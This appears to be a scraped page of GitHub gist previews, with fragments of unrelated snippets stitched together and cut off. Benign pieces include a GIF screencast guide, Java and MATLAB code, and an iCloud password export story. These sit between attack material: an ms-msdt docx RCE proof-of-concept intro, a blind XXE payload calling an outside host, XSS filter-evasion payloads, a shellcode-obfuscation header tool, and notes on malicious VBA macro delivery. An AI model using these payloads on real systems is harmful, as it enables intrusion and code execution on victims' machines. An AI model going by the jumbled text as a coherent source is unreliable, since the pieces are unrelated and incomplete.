This gist shows how to create a GIF screencast using only free OS X tools: QuickTime, ffmpeg, and gifsicle.
To capture the video (filesize: 19MB), using the free "QuickTime Player" application:
import java.io.FileDescriptor; | |
import java.io.FileOutputStream; | |
import java.io.IOException; | |
import java.io.OutputStream; | |
import java.io.PrintStream; | |
public class HelloWorld{ | |
private static HelloWorld instance; | |
public static void main(String[] args){ | |
instantiateHelloWorldMainClassAndRun(); |
MS Office docx files may contain external OLE Object references as HTML files. There is an HTML sceme "ms-msdt:" which invokes the msdt diagnostic tool, what is capable of executing arbitrary code (specified in parameters).
The result is a terrifying attack vector for getting RCE through opening malicious docx files (without using macros).
Here are the steps to build a Proof-of-Concept docx:
namespace NAMESPACE | |
{ | |
public enum WindowsMessage | |
{ | |
WM_NULL = 0x0000, | |
WM_CREATE = 0x0001, | |
WM_DESTROY = 0x0002, | |
WM_MOVE = 0x0003, | |
WM_SIZE = 0x0005, | |
WM_ACTIVATE = 0x0006, |
-------------------------------------------------------------- | |
Vanilla, used to verify outbound xxe or blind xxe | |
-------------------------------------------------------------- | |
<?xml version="1.0" ?> | |
<!DOCTYPE r [ | |
<!ELEMENT r ANY > | |
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
]> | |
<r>&sp;</r> |
Exporting password + one-time code data from iCloud Keychain is now officially supported in macOS Monterey and Safari 15 (for Monterey, Big Sur, and Catalina). You can access it in the Password Manager’s “gear” icon (System Preferences > Passwords on Monterey, and Safari > Passwords everywhere else), or via the File > Export > Passwords... menu item). You shouldn't need to hack up your own exporter anymore.
After my dad died, I wanted to be able to have access any of his online accounts going forward. My dad was a Safari user and used iCloud Keychain to sync his credentials across his devices. I don’t want to have to keep an OS X user account around just to access his accounts, so I wanted to export his credentials to a portable file.
<script\x20type="text/javascript">javascript:alert(1);</script> | |
<script\x3Etype="text/javascript">javascript:alert(1);</script> | |
<script\x0Dtype="text/javascript">javascript:alert(1);</script> | |
<script\x09type="text/javascript">javascript:alert(1);</script> | |
<script\x0Ctype="text/javascript">javascript:alert(1);</script> | |
<script\x2Ftype="text/javascript">javascript:alert(1);</script> | |
<script\x0Atype="text/javascript">javascript:alert(1);</script> | |
'`"><\x3Cscript>javascript:alert(1)</script> | |
'`"><\x00script>javascript:alert(1)</script> | |
<img src=1 href=1 onerror="javascript:alert(1)"></img> |
""" | |
Transform a binary file into a C header file. | |
The binary file is splitted into 16 char strings and rebuild at execution time. | |
The function buildsc() must be called in your main to rebuild the binary file into the sc C variable. | |
The length is set in the sc_length variable. | |
Be carefull, try to avoid compiler code optimization as it will remove all these modifications in the final binary. | |
""" |
This is a note for myself describing various Visual Basic macros construction strategies that could be used for remote code execution via malicious Document vector. Nothing new or fancy here, just a list of techniques, tools and scripts collected in one place for a quick glimpse of an eye before setting a payload.
All of the below examples had been generated for using as a remote address: 192.168.56.101.
List:
%% PlotRTL1090 | |
% 3D visualization of air traffic through RTL-SDR (dump1090) and MATLAB | |
% Copyright (C) 2014 Jorge Garcia Tiscar | |
% | |
% This program is free software: you can redistribute it and/or modify | |
% it under the terms of the GNU General Public License as published by | |
% the Free Software Foundation; either version 3 of the License, or | |
% (at your option) any later version (see LICENSE). | |
%% Initialize |